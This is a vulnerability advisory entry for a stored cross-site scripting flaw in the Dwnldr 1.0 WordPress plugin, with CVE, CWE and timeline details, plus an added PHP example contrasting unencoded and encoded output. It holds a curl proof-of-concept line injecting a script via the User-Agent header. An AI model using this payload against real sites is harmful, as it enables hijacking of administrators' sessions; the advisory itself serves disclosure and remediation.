Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)



Description
Dwnldr logs the User-Agent string of every download request it processes and displays it back to the admin with no output encoding, so a script sent in that header by an unauthenticated client is stored and then executed in the admin's browser.
Proof of Concept
curl -A "User-Agent: <script>alert(document.cookie);</script>" -O http://<target>/?attachment_id=<attachment id>  
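
An added example, not taken from Dwnldr or the original disclosure: the unencoded rendering pattern described above beside an output-encoded one, in plain PHP. The function names, log structure and sample rows are hypothetical; inside WordPress, `esc_html()` is the usual call for this context.

```php
<?php
// Added example with hypothetical names; this is not Dwnldr's actual code.

// Constructed sample log rows: an ordinary client and the PoC value from this page.
$download_log = [
    ['attachment_id' => 12, 'user_agent' => 'Mozilla/5.0 (X11; Linux x86_64)'],
    ['attachment_id' => 12, 'user_agent' => '<script>alert(document.cookie);</script>'],
];

// Vulnerable pattern: the stored header value is concatenated into HTML as-is.
function render_row_unencoded(array $row): string
{
    return '<tr><td>' . (int) $row['attachment_id'] . '</td><td>'
        . $row['user_agent'] . '</td></tr>';
}

// Hardened pattern: encode at output time for the HTML text context.
// Plain PHP is used here so the block runs outside WordPress.
function render_row_encoded(array $row): string
{
    $ua = htmlspecialchars($row['user_agent'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<tr><td>' . (int) $row['attachment_id'] . '</td><td>' . $ua . '</td></tr>';
}

// Regression check: a stored value must not introduce markup into the rendered row.
function row_is_inert(string $html): bool
{
    // Remove the tags the template itself emits; any "<" left over came from data.
    $without_template = str_replace(['<tr>', '</tr>', '<td>', '</td>'], '', $html);
    return strpos($without_template, '<') === false;
}

// Render every row both ways and report whether the result is free of injected markup.
foreach ($download_log as $row) {
    printf(
        "unencoded inert: %s | encoded inert: %s\n",
        var_export(row_is_inert(render_row_unencoded($row)), true),
        var_export(row_is_inert(render_row_encoded($row)), true)
    );
}
```

The encoding is applied where the value is written into the page rather than where it is logged, so rows stored before a fix are rendered safely as well.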

Affects Plugin

fixed in version 1.01

References

CVE 2016-10964
URL https://rastating.github.io/dwnldr-1-0-stored-xss-disclosure

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Rob Carr
Submitter Website http://blog.rastating.com/
Submitter Twitter iamrastating
Verified No
WPVDB ID 8556

Timeline

Publicly Published 2016-07-18
Added 2016-07-19
Last Updated 2019-11-28
